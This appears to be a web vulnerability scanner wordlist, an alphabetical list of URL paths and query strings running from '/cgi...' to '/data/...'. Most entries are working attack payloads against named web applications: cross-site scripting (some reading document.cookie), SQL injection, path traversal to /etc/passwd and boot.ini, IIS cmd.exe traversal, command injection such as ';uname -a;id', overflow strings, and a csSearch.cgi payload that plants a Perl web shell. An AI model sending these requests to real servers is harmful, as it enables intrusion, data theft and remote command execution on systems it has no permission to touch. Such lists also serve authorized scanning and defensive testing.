/cgitest.exe?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/cgiWebupdate.exe
/cgiwin/
/cgiwrap
/cgi_bin/
/change-your-password.pl~
/ChangeLog
/changelog.htm
/changelog.html
/CHANGELOG.txt
/changepw.exe
/CHANGES
/CHANGES.txt
/changes.xml
/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid=%27%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%22%29
/changs.txt
/chart
/chart/
/charting/
/charts
/charts.php?action=vote&rate=1&id=%27
/charts.php?action=vote&rate=1&id=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/charts/
/chassis/config/GeneralChassisConfig.html
/chat.php?sid=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/chat/
/chat/!nicks.txt
/chat/!pwds.txt
/chat/config/start_page.css.php3?Charset=iso-8859-1&medium=10&FontName=%3E%22%27%3E%3Cimg+src%3D&%23x6a%3B&%23x61%3B&%23x76%3B&%23x61%3B&%23x73%3B&%23x63%3B&%23x72%3B&%23x69%3B&%23x70%3B&%23x74%3B&%23x3a%3Balert%2810188%29%3E
/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=%3E%22%27%3E%3Cimg+src%3D&%23x6a%3B&%23x61%3B&%23x76%3B&%23x61%3B&%23x73%3B&%23x63%3B&%23x72%3B&%23x69%3B&%23x70%3B&%23x74%3B&%23x3a%3Balert%2810198%29%3E
/chat/data/usr
/chat/deluser.php3?L=english&Link=&LIMIT=%3E%22%27%3E%3Cimg+src%3D&%23x6a%3B&%23x61%3B&%23x76%3B&%23x61%3B&%23x73%3B&%23x63%3B&%23x72%3B&%23x69%3B&%23x70%3B&%23x74%3B&%23x3a%3Balert%2810190%29%3E&AUTH_USERNAME=&AUTH_PASSWORD=
/chat/edituser.php3
/chat/passwd.cgi
/chat/passwd.pl
/chat/usersL.php3?L=russian&R='
/chat/users_popupL.php3?From=%3E%22%3E%3Cscript%3Ealert%2810196%29%3C%2Fscript%3E
/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=%22%3E%3C%2FSTYLE%3E%3CSTYLE%3E%40import%22javascript%3Aalert%2810192%29%22%3B%3C%2FSTYLE%3E%27
/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B=%3E%22%3E%3Cscript%3Ealert%2810194%29%3C%2Fscript%3E
/chatlog.nsf
/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/check.html
/check.php
/check/
/CheckingXssInReferer.html
/check_user_id.php?user_id=%3Cscript%3Ealert%2810548%29%3C%2Fscript%3E
/chip.ini
/ChipCfg.cfg
/ciamos/class/debug/highlight.php?file=highlight.php&line=1
/Cinnt%5Cwin.ini
/Citrix/
/citrix/applist.asp
/citrix/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
/Citrix/ICAWEB/
/Citrix/NFuse17/
/Citrix/NFuseAdmin/
/Citrix/NFuseEnterprise/
/citrix/pnagent/
/claroline/auth/extauth/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../boot.ini%00
/claroline/auth/extauth/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../etc/passwd%00
/claroline/auth/extauth/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../winnt/win.ini%00
/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=/../../../../../../../../boot.ini%00
/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=/../../../../../../../../etc/passwd%00
/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=/../../../../../../../../winnt/win.ini%00
/claroline/auth/extauth/drivers/mambo.inc.php?includePath=/../../../../../../../../boot.ini%00
/claroline/auth/extauth/drivers/mambo.inc.php?includePath=/../../../../../../../../etc/passwd%00
/claroline/auth/extauth/drivers/mambo.inc.php?includePath=/../../../../../../../../winnt/win.ini%00
/claroline/auth/ldap/authldap.php?includePath=/../../../../../../../../boot.ini%00
/claroline/auth/ldap/authldap.php?includePath=/../../../../../../../../etc/passwd%00
/claroline/auth/ldap/authldap.php?includePath=/../../../../../../../../winnt/win.ini%00
/claroline/inc/lib/event/init_event_manager.inc.php?includePath=/../../../../../../../../boot.ini%00
/claroline/inc/lib/event/init_event_manager.inc.php?includePath=/../../../../../../../../etc/passwd%00
/claroline/inc/lib/event/init_event_manager.inc.php?includePath=/../../../../../../../../winnt/win.ini%00
/claroline/user/userInfo.php?uInfo=1%20UNION%20SELECT%20concat(char(254),char(83),char(80),char(73),char(45),char(83),char(81),char(76)),0,0,0,0,0/*
/class.forumposts.php?cmd=ls%20-la&bbPath[path]=../../../../../../../../boot.ini%00
/class.forumposts.php?cmd=ls%20-la&bbPath[path]=../../../../../../../../etc/passwd%00
/class.forumposts.php?cmd=ls%20-la&bbPath[path]=../../../../../../../../winnt/win.ini%00
/class.module/class.event_manager.php
/class/
/class/bootstrap.php
/class/class.admin_menu_cms.php
/class/class.conf_cms.php
/class/class.conf_fw.php
/class/debug/debug_show.php
/class/mysql.class
/ClassCache/
/classes
/classes/
/classes/admin_o.php?absolutepath=httpexistent_hacker_box/
/classes/main_class.php?default_path=404937102423%00
/classified
/classified.cgi
/classified.pl
/classified/
/classifieds
/classifieds.cgi
/classifieds.pl
/classifieds/
/classifieds/classifieds.cgi
/classifieds/contact.php?contact=1&productid=1'
/classifieds/index.php?cat=1'
/classifieds/showcat.php?cat=1'&stype=1&si=1
/classifieds/showproduct.php?product=10&sort=1'&cat=all&page=1
/class_ads/category.php?cat=s'+union+select+1,2,3,4,5,6,7,8,9,concat(0x32,0x30,0x30,0x38,0x30,0x35,0x32,0x31,0x20,0x36,0x38,0x20,0x43,0x6C,0x61,0x73,0x73,0x69,0x66,0x69,0x65,0x64,0x73,0x20,0x76,0x2E,0x34,0x2E,0x30,0x2E,0x31,0x20,0x28,0x63,0x61,0x74,0x29,0x20,0x53,0x51,0x4C,0x20,0x49,0x6E,0x6A,0x65,0x63,0x74,0x69,0x6F,0x6E)+from+class_users/*
/clbusy.nsf
/cldbdir.nsf
/cleanup.log
/cleanup.txt
/click.pl
/clickcount.pl
/clickcount.pl?view=test
/clickresponder.pl
/client
/client/
/cliente/
/clientes/
/clients
/clients.exe
/clients.htx
/clients/
/clock$/clock$
/clocktower
/clocktower/
/closeup/
/club/
/clusta4.nsf
/cm/
/cmd
/cmd.exe?/c+dir
/cmd1.exe?/c+dir
/cmd32.exe
/cmdasp.asp
/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,11221133,null,null/*
/cmsample/
/cmsample/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/cmsample/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/cmsample/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cmsample/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/cmsample/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/cmsample/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cmsample/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cmsample/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cmsample/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cnt6.inc.php?BL%5Bbe_cnt_plainhtml%5D=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cobalt-images/
/code
/code.php
/code.php3
/code.php3?common.inc
/code/
/code/faqmanager.cgi?toc=/etc/passwd%00
/code/inc_header.php?gTopNombre=%22%3E%3Cscript%3Ealert('xss403337101220');%3C/script%3E%3Ctest=%22
/codes
/codes/
/coding/
/coins_list.php?member_id=%27
/coldfusion/join.cfm
/collect4.nsf
/COM
/com.endymion.sake.servlet.mail.MailServlet
/com/novell/gwmonitor/help/en/default.htm
/com/novell/webaccess/help/en/default.htm
/com/novell/webpublisher/help/en/default.htm
/com1
/com1/
/com1/com1
/com2
/com2.bat
/com2/
/com2/com2
/com3
/com3 
/com3/
/comersus_backoffice_message.asp?message=%3Cscript%3Ealert%28xss%29%3C/script%3E
/comersus_backoffice_message.asp?message=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now
/comersus_supportError.asp?error=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/commander.pl
/commandit.cgi
/comment.php?lang=en&mode=new&entryref=&backurl=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/comment.php?mode=Delete&sid=1&cid=<script>alert('vulnerable')</script>
/comment.php?mode=display&sid=foo&pid='
/commentaires.php?commentaire=%22%3E%3Cscript%3Ealert%28xss%29%3C/script%3E
/comments.php?op=view&newsid=4&showpost=%22%3E%3Ch1%3EAttackerXSSvulnerable%3C!--
/comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview
/comments.php?subject=<script>alert('vulnerable')</script>&comment=<script>alert('vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
/comments.php?thold='
/comments/
/comments/browse.php?fid=1&tid=1&go=<script>alert('CSS')</script>
/comments/browse.php?fid=2&tid=4&go=&lt
/comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('vulnerable')&lt;/script&gt;
/comment_add.asp?ID=3&email=<script>alert(document.cookie)</script>
/comment_add_cgi.php
/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/common
/common.inc
/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/common.php?include_path=/../../../../../../../../boot.ini%00
/common.php?include_path=/../../../../../../../../etc/passwd%00
/common.php?include_path=/../../../../../../../../winnt/win.ini%00
/common/
/common/browser.inc
/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/communicator/
/community/forum/index.cfm?FTVAR_SUBCAT=%27&nocookies=y&subcatname=
/community/forumdisplay.php
/community/forumdisplay.php?fid=21"><script>alert('vulnerable')</script>
/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/compatible.cgi?<script>vulnerable
/component/
/components/
/compose.php
/compra/
/compras/
/compressed/
/compte.php?achat=1&valider=1&identifiant='
/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
/computers/default.asp?sort=&Direction=';
/con
/con/con
/conecta/
/conf
/CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y
/conf/
/confidential/
/config
/config$
/config$/config$
/config.inc
/config.php
/config.sys
/config/
/config/check.txt
/config/checks.txt
/config/database.yml
/config/import.txt
/config/mountain.cfg
/Config1.htm
/configs/
/configset.php?settings_dir=/../../../../../../../../boot.ini%00
/configset.php?settings_dir=/../../../../../../../../etc/passwd%00
/configset.php?settings_dir=/../../../../../../../../winnt/win.ini%00
/configuration.inc
/configuration/httpListenerEdit.jsf?name=%3Cscript%3Ealert%2810636%29%3C%2Fscript%3E&configName=server-config
/configure
/configure.php
/configure.txt
/connect.asp?server=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/connect.inc
/connect/
/connection.inc
/connections/
/console
/console.exe?page_size=...
/console/
/console/actions/jndi/JndiFramesetAction?server=<script>alert(xss);</script>
/console/index.jsp
/console?resource=/../../../../../../../../boot.ini
/console?resource=/../../../../../../../../winnt/win.ini
/ConsoleHelp
/ConsoleHelp/login.jsp
/conspass.chl+
/consport.chl+
/contact
/contact/
/contactus/index.cgi?Message=<script>alert('CSS')</script>
/contactus_add_edit.asp?contactid=%27&pageid=2
/content-space
/content.asp?catid='
/content.asp?CatId='&ContentType=Company
/content.asp?ContentId='
/content.asp?contenttype=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/content.asp?do_search=0&keywords=contact&page_no=2&sortby='
/content.php?act=something-wrong
/content.php?content=httpexistent_hacker_box/
/content.pl
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1
/content.pl?group=49&id=140a
/content/
/content/base/build/explorer/none.php?.....passwd:
/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
/content/base/build/explorer/none.php?/etc/passwd
/content/forums/reply.asp?Forum_Id=3&Topic_Id=%27
/Content/Home/anyfile.jsp
/Content/Home/Jsp/anyfile.jsp
/content/users/login.asp?error=<script>alert(document.cookie)</script>
/contents.php?new_language=elvish&mode=select
/contents/
/contents/extensions/asp/1
/contrib/
/contrib/example.php?language=../../../../../../../../etc/passwd
/contrib/example.php?language=..\..\..\..\..\..\..\..\boot.ini
/contrib/example.php?language=..\..\..\..\..\..\..\winnt\win.ini
/control/
/controlpanel/
/ConversionReport.txt
/cookmail/cookmail
/cookmail/cookmail.exe
/cool-logs
/cool-logs/
/Coot.ini
/coppermine/thumbnails/meta=%22%3e%3cscript%3ealert(xss)%3c/script%3etopn/album=1.html
/coppermine/thumbnails/metatopn/album=1.html%22%3e%3cscript%3ealert(xss)%3c/script%3e
/Copy%20of%20cgi-bin
/Copy%20of%20icons
/Copy%20of%20index
/Copy%20of%20login1.asp
/Copy%20Of%20Web.config
/copy.log
/copyright.txt
/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/core
/core/adodb/server.php?do=undefined_special_function&sql=generate_sql_error
/core/adodb/tests/tmssql.php?do=undefined_special_function&sql=generate_sql_error
/corp/
/correo/
/cosmicshop/search.php?max=-1%27
/cosmicshop/search.php?query=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cosmicshop/search_cat.php=doc&data=%3cscript%3ealert(xss)%3c%2fscript%3e
/Count.cgi
/counter
/counter-ord
/counter.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/counter.pl
/counter/
/counter/1/n/n/0/3/5/0/a/123.gif
/counterbanner
/counterbanner-ord
/counterfiglet
/counterfiglet-ord
/counterfiglet/nc/f=;echo;w;uname%20-a;id
/course_tools/
/cover.php?name=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cowsconf/
/cowsconf/config.asc
/cp/
/cpa.nsf
/cpa.nsf/?OpenDatabase
/cpanel/
/cplogfile.log
/cpmdaemon.cgi
/cpqlogin.htm
/cqweb/login?%2Fcqweb%2Fmain%3Fcommand=GenerateMainFrame&service=CQ&schema=SCHEMAHERE%22%3B+alert%2810456%29%3B%2F%2F&contextid=DATABASECONTEXTHERE%22%3B+alert%2810456%29%3B%2F%2F
/cqweb/login?targetUrl=%2Fcqweb%2Fmain%3Fcommand%3DGenerateMainFrame&ratl_userdb=DBHERE%2C&test=&clientServerAddress=http%3A%2F%2F%2Fcqweb%2Flogin&username=test%3C%2Fscript%3E%3Cscript%3Ealert%2810458%29%3C%2Fscript%3E&password=test&schema=SCHEMAHERE&userDb=DBHERE
/crack/
/cracks/
/Crazy-cgi/CrazyWWWBoard.cgi
/Crazy-cgi/CrazyWWWBoardLE.cgi
/Crazy-cgi/CrazyWWWBoardLE.exe
/crazy3/CrazyWWWBoard.cgi
/crazy3/CrazyWWWBoardLE.cgi
/crazy3/CrazyWWWBoardLE.exe
/crazy5/CrazyWWWBoard.cgi
/crazy5/CrazyWWWBoardLE.cgi
/crazy5/CrazyWWWBoardLE.exe
/CrazyWWWBoard.cgi
/CrazyWWWBoard2000p2/CrazyWWWBoard.cgi
/CrazyWWWBoard2000p2/CrazyWWWBoardLE.cgi
/CrazyWWWBoard2000p2/CrazyWWWBoardLE.exe
/CrazyWWWBoardLE.cgi
/CrazyWWWBoardLE.exe
/createaccount.cgi
/CreatedByHP1
/credit
/credit/
/creditcards
/creditcards/
/cron.php?path_to_config=/../../../../../../../../boot.ini%00
/cron.php?path_to_config=/../../../../../../../../etc/passwd%00
/cron.php?path_to_config=/../../../../../../../../winnt/win.ini%00
/crons.php?plan_id=%27
/crons.php?plan_id=35&domain=%27
/crossdomain.xml
/crypto
/crypto/
/crystalreportviewers/
/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\boot.ini
/CS/
/CS/news/index.php?number=500&maxentries=-10
/csChatRBox.cgi?command=savesetup&setup=PERL_CODE_HERE
/CSCOnm/servlet/com.cisco.nm.cmf.servlet.CsAuthServlet
/csFAQ/
/csGuestbook.cgi?command=savesetup&setup=PERL_CODE_HERE
/csh
/csLiveSupport.cgi?command=savesetup&setup=PERL_CODE_HERE
/CSMailto/CSGrid.cgi
/CSMailto/CSIncludes.cgi
/csNews.cgi
/csNews.cgi?command=manage&database=default%2edb&mpage=manager
/csNews.cgi?command=viewnews&database=none
/csNews.cgi?database=default%2edb&command=showadv&mpage=manager
/csPassword/csPassword.cgi?command=remove
/csPassword/password.cgi.tmp
/csr/
/css
/css/
/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
/CSSearch/
/csSearch/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
/cstat.pl
/csv_db/csv_db.cgi?file=|id|
/ctc
/ctc/
/ct_logon.asp?CTLoginErrorMsg=<script>alert('CSS')</script>
/cuenta/
/cuentas/
/cum/
/currency/
/current/
/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
/custdata/
/customer
/customer.dbf
/customer/
/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
/Customeraddresses_RecordAction.cfm?RecordID=1%27&CustomerID=6&set=yes
/customeradmin/
/customerdata.nsf
/customers
/customers.dbf
/customers/
/customers/login.php?customerEmailAddress=%22%3E%3Cscript%3Ealert('_START_test_END_')%3C/script%3E
/customerservice/
/custom_link.asp?method=Topic&TOPIC_ID='
/cutecast
/cutecast/
/cutecast/members
/cutenews/
/cutenews/comments.php
/cutenews/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script>
/cutenews/index.php?debug
/cutenews/search.php
/cutenews/shownews.php
/cutenews/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&uca&p
/cutenews/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&a
/cv/
/cvs/
/CVS/Entries
/CVS/Repository
/CVS/Root
/cvsquery.cgi
/cvsquery.cgi?branch=<script>alert('vulnerable')</script>&file=<script>alert('vulnerable')</script>&date=<script>alert('vulnerable')</script>
/cvsquery.cgi?module=<script>alert('vulnerable')</script>&branch=&dir=&file=&who=<script>alert('vulnerable')</script>&sortby=Date&hours=2&date=week
/cvsqueryform.cgi
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('vulnerable')</script>&branch=HEAD
/cvstrac/filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;id;
/cvsweb.cgi
/cvsweb/
/cwb-bin/CrazyWWWBoard.cgi
/cwb-bin/CrazyWWWBoardLE.cgi
/cwb-bin/CrazyWWWBoardLE.exe
/cwb2000/CrazyWWWBoard.cgi
/cwb2000/CrazyWWWBoardLE.cgi
/cwb2000/CrazyWWWBoardLE.exe
/CWMail.exe
/cybercash/
/cybercrash/
/CYBERDOCS/
/CYBERDOCS25/
/CYBERDOCS31/
/c_download.cgi
/d/
/d/httpodbc.dll
/d/inetpub/scripts/root.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/d://
/da.nsf
/dana-na/auth/remediate.cgi?action=&step=preauth
/dana-na/auth/remediate.cgi?step=preauth
/dan_o.dat
/darkportal/
/darkportal/CHANGES
/dashboard/
/dasp/
/dasp/fm_shell.asp
/dat
/dat/
/data
/data.dbf
/data.htm
/data.html
/data.sql
/data.txt
/data/
/data/compatible.php?module_name=/../../../../../../../../boot.ini%00
/data/compatible.php?module_name=/../../../../../../../../etc/passwd%00
/data/compatible.php?module_name=/../../../../../../../../winnt/win.ini%00
/data/data.dat
/data/fetch.php?page='
/data/inc/footer.php?lang_footer=%3Cscript%3Ealert%2810730%29%3C%2Fscript%3E
/data/inc/header.php?lang_install22=%3Cscript%3Ealert%2810734%29%3C%2Fscript%3E
/data/inc/header.php?lang_kop15=%3Cscript%3Ealert%2810746%29%3C%2Fscript%3E
/data/inc/header.php?lang_kop1=%3Cscript%3Ealert%2810738%29%3C%2Fscript%3E
/data/inc/header.php?lang_kop2=%3Cscript%3Ealert%2810740%29%3C%2Fscript%3E
/data/inc/header.php?lang_kop4=%3Cscript%3Ealert%2810744%29%3C%2Fscript%3E
